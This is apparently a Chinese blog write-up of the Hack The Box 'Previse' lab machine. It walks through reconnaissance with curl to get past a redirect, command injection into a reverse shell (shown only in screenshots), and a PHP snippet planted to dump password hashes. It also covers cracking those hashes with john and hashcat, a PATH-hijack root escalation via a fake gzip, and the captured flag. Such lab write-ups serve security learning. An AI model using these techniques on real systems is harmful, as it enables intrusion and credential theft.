

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=&#34;auto&#34;>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/favicon.png">
  <link rel="icon" href="/img/favicon.png">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="Crush">
  <meta name="author" content="John Doe">
  <meta name="keywords" content="">
  
  <title>Previse - Crush&#39;s Blog</title>

  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.6.0/dist/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/github-markdown-css@4.0.0/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@10.7.2/styles/github-gist.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css" />
  



<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->

  
<link rel="stylesheet" href="/css/diy/shubiao.css">
<link rel="stylesheet" href="//cdn.jsdelivr.net/npm/aplayer/dist/APlayer.min.css">



  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.8.11","typing":{"enable":true,"typeSpeed":160,"cursorChar":"_","loop":false},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"copy_btn":true,"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null}},"search_path":"/local-search.xml"};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 5.4.0"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/">&nbsp;<strong>Crush's Blog</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/">
                <i class="iconfont icon-link-fill"></i>
                友链
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" data-toggle="modal" data-target="#modalSearch">&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;</a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner" id="banner" parallax=true
         style="background: url('/img/default.png') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="Previse">
              
            </span>

            
              <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2021-10-18 14:54" pubdate>
        2021年10月18日 下午
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      710 字
    </span>
  

  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      10
       分钟
    </span>
  

  
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">Previse</h1>
            
            <div class="markdown-body">
              <hr>
<pre><code>参考wp：
https://davidguest.uk/hack-the-box-previse/
https://hackhouse.net/htb-previse/
</code></pre>
<h2 id=""><a href="#" class="headerlink" title=""></a><img src="https://pic.imgdb.cn/item/616d1a942ab3f51d91a35671.jpg" srcset="/img/loading.gif" lazyload></h2><pre><code>老惯例，nmap 
nmap -v -sSV -p 22,80 -Pn 10.10.11.104 -T4 -oA nmap/sSV 感觉免费的简单靶场都是22 和 80
</code></pre>
<p><img src="https://pic.imgdb.cn/item/616d1aca2ab3f51d91a3898a.jpg" srcset="/img/loading.gif" lazyload><br>页面打开是这么个玩意儿<br><img src="https://pic.imgdb.cn/item/616d1aee2ab3f51d91a3aeed.jpg" srcset="/img/loading.gif" lazyload><br>目录扫描没扫出什么东西<br>使用 curl 时，可以从 webapp 获取真正的响应页面，因为 curl 默认不遵循重定向。</p>
<hr>
<pre><code>curl -is -X GET 10.10.11.104/index.php
</code></pre>
<p>访问一下10.10.11.104/accounts.php </p>
<hr>
<pre><code>curl -is -X http://10.10.11.104/account.php
</code></pre>
<p><img src="https://pic.imgdb.cn/item/616d1af42ab3f51d91a3b3ce.jpg" srcset="/img/loading.gif" lazyload><br>发现了3个表单，提交数据 并且说了用户名和密码在5-32个字符之间<br><img src="https://pic.imgdb.cn/item/616d1af72ab3f51d91a3b79b.jpg" srcset="/img/loading.gif" lazyload><br>-d POST 发送有参数的 POST 请求<br>用curl提交post请求访问一下 </p>
<hr>
<pre><code>curl -is -X POST -d &quot;username=hacker&amp;password=hacker&amp;confirm=hacker&quot; 10.10.11.104/accounts.php  
</code></pre>
<p>成功登陆。<br><img src="https://pic.imgdb.cn/item/616d1afc2ab3f51d91a3bcde.jpg" srcset="/img/loading.gif" lazyload><br>开始翻网站，翻到一个像是被注入过的一个日志文件<br><img src="https://pic.imgdb.cn/item/616d1b002ab3f51d91a3c109.jpg" srcset="/img/loading.gif" lazyload><br>file目录下有一个上传和一个上传文件的下载 backup，备份，网站备份文件，打开，干他 看备份文件就看config，db，这类的<br><img src="https://pic.imgdb.cn/item/616d1b062ab3f51d91a3c643.jpg" srcset="/img/loading.gif" lazyload><br>解压文件 unzip siteBackup.zip<br><img src="https://pic.imgdb.cn/item/616d1b092ab3f51d91a3c8e1.jpg" srcset="/img/loading.gif" lazyload><br>config.php  是一个数据库配置文件，可以尝试连一下ssh<br><img src="https://pic.imgdb.cn/item/616d1b0d2ab3f51d91a3ccc8.jpg" srcset="/img/loading.gif" lazyload><br>没啥用，继续翻文件logs.php 看到一个exec命令执行的函数<br><img src="https://pic.imgdb.cn/item/616d1b0f2ab3f51d91a3cf92.jpg" srcset="/img/loading.gif" lazyload><br>&amp;&amp; 连接一个反弹shell的命令<br><img src="https://pic.imgdb.cn/item/616d1b122ab3f51d91a3d22e.jpg" srcset="/img/loading.gif" lazyload><br><img src="https://pic.imgdb.cn/item/616d1b172ab3f51d91a3d6af.jpg" srcset="/img/loading.gif" lazyload><br><img src="https://pic.imgdb.cn/item/616d1b1a2ab3f51d91a3d96d.jpg" srcset="/img/loading.gif" lazyload><br>连接成功，是个低权限的 ls 没有要找到的user root flag<br>但是/home/下有一个用户m4lwhere，下面有一个user.txt，需要m4lwhere权限才能访问<br>前面拿到数据库配置的文件，看能不能再数据库里面找到m4lwhere的hash 用hashcat 爆一下<br>构造脚本</p>
<hr>
<pre><code>&lt;?php
$db = connectDB();

$query = &quot;SELECT username, password FROM accounts&quot;;
$users = $db-&gt;query($query);

if ($users-&gt;num_rows &gt; 0) &#123;
    while($row = mysqli_fetch_assoc($users)) &#123;
      var_dump($row);
    &#125;
  &#125;

$db-&gt;close();
</code></pre>
<hr>
<pre><code>echo &#39;&lt;上面的代码&gt;&#39; &gt;&gt; status.php里
</code></pre>
<hr>
<pre><code>curl 10.10.11.104/status.php  访问那个文件，成功读到了他的hash
</code></pre>
<h2 id="-1"><a href="#-1" class="headerlink" title=""></a><img src="https://pic.imgdb.cn/item/616d1b1f2ab3f51d91a3ddcf.jpg" srcset="/img/loading.gif" lazyload></h2><pre><code>m4lwhere的hash就是
$1$🧂llol$DQpmdvnb7EeuO6UaqRItf.
</code></pre>
<hr>
<pre><code>用john 或者 hashcat跑hash明文
</code></pre>
<hr>
<pre><code>john
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=md5crypt-long
</code></pre>
<h2 id="-2"><a href="#-2" class="headerlink" title=""></a><img src="https://pic.imgdb.cn/item/616d1b242ab3f51d91a3e262.jpg" srcset="/img/loading.gif" lazyload></h2><pre><code>hashcat
hashcat hash.txt /usr/share/wordlists/rockyou.txt -m 500
</code></pre>
<p><img src="https://pic.imgdb.cn/item/616d1b272ab3f51d91a3e54e.jpg" srcset="/img/loading.gif" lazyload><br>ssh连接拿到第一个user.txt<br><img src="https://pic.imgdb.cn/item/616d1b272ab3f51d91a3e54e.jpg" srcset="/img/loading.gif" lazyload></p>
<h2 id="提权"><a href="#提权" class="headerlink" title="提权"></a>提权</h2><hr>
<pre><code>sudo -l  看到一个access_backup.sh的root文件
</code></pre>
<hr>
<pre><code>m4lwhere@previse:~$ cat /opt/scripts/access_backup.sh
#!/bin/bash

# We always make sure to store logs, we take security SERIOUSLY here

# I know I shouldnt run this as root but I cant figure it out programmatically on my account
# This is configured to run with cron, added to sudo so I can run as needed - we&#39;ll fix it later when there&#39;s time

gzip -c /var/log/apache2/access.log &gt; /var/backups/$(date --date=&quot;yesterday&quot; +%Y%b%d)_access.gz
gzip -c /var/www/file_access.log &gt; /var/backups/$(date --date=&quot;yesterday&quot; +%Y%b%d)_file_access.gz
</code></pre>
<hr>
<pre><code>cd /tmp
cat &lt;&lt; EOF &gt; gzip
&gt; #!/bin/bash
&gt; cp /bin/bash /tmp/c
&gt; chmod u+s /tmp/c
&gt; EOF
chmod +x gzip
export PATH=$( pwd ):$PATH

sudo /opt/scripts/access_backup.sh
./c -p
</code></pre>
<hr>
<pre><code>提权不是很懂，这个有点像是环境变量劫持，成功提权
</code></pre>
<hr>
<pre><code>514371f6578495a1ae9624f3a199f944
</code></pre>
<p><img src="https://pic.imgdb.cn/item/616d1b302ab3f51d91a3ed10.jpg" srcset="/img/loading.gif" lazyload></p>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                  <div class="post-meta mr-3">
                    <i class="iconfont icon-category"></i>
                    
                      <a class="hover-with-bg" href="/categories/Hack-The-Box/">Hack The Box</a>
                    
                  </div>
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/Hack-The-Box/">Hack The Box</a>
                    
                  </div>
                
              </div>
              
                <p class="note note-warning">
                  
                    本博客所有文章除特别声明外，均采用 <a target="_blank" href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处！
                  
                </p>
              
              
                <div class="post-prevnext">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2021/10/18/Hach%20The%20Box-Horizontall/">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">Horizontall</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2021/10/18/Hach%20The%20Box-BountyHunter/">
                        <span class="hidden-mobile">BountyHunter</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div class="toc-body" id="toc-body"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    

    
      <a id="scroll-top-button" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
    

    
  </main>

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
  </div>
  
  <div class="statistics">
    
    

    
      
        <!-- 不蒜子统计PV -->
        <span id="busuanzi_container_site_pv" style="display: none">
            总访问量 
            <span id="busuanzi_value_site_pv"></span>
             次
          </span>
      
      
        <!-- 不蒜子统计UV -->
        <span id="busuanzi_container_site_uv" style="display: none">
            总访客数 
            <span id="busuanzi_value_site_uv"></span>
             人
          </span>
      
    
  </div>


  

  
</footer>


  <!-- SCRIPTS -->
  
  <script  src="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.jsdelivr.net/npm/jquery@3.6.0/dist/jquery.min.js" ></script>
<script  src="https://cdn.jsdelivr.net/npm/bootstrap@4.6.0/dist/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  
    <script  src="/js/img-lazyload.js" ></script>
  



  



  <script  src="https://cdn.jsdelivr.net/npm/tocbot@4.12.3/dist/tocbot.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/anchor-js@4.3.1/anchor.min.js" ></script>



  <script defer src="https://cdn.jsdelivr.net/npm/clipboard@2.0.8/dist/clipboard.min.js" ></script>



  <script  src="/js/local-search.js" ></script>



  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>




  <script  src="https://cdn.jsdelivr.net/npm/typed.js@2.0.12/lib/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var title = document.getElementById('subtitle').title;
      
      typing(title)
      
    })(window, document);
  </script>














  
<script src="/js/diy/timeDate.js"></script>
<script src="//cdn.jsdelivr.net/npm/aplayer/dist/APlayer.min.js"></script>
<script src="//cdn.jsdelivr.net/gh/metowolf/Metingjs@1.2/dist/Meting.min.js"></script>



<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>


</body>
</html>
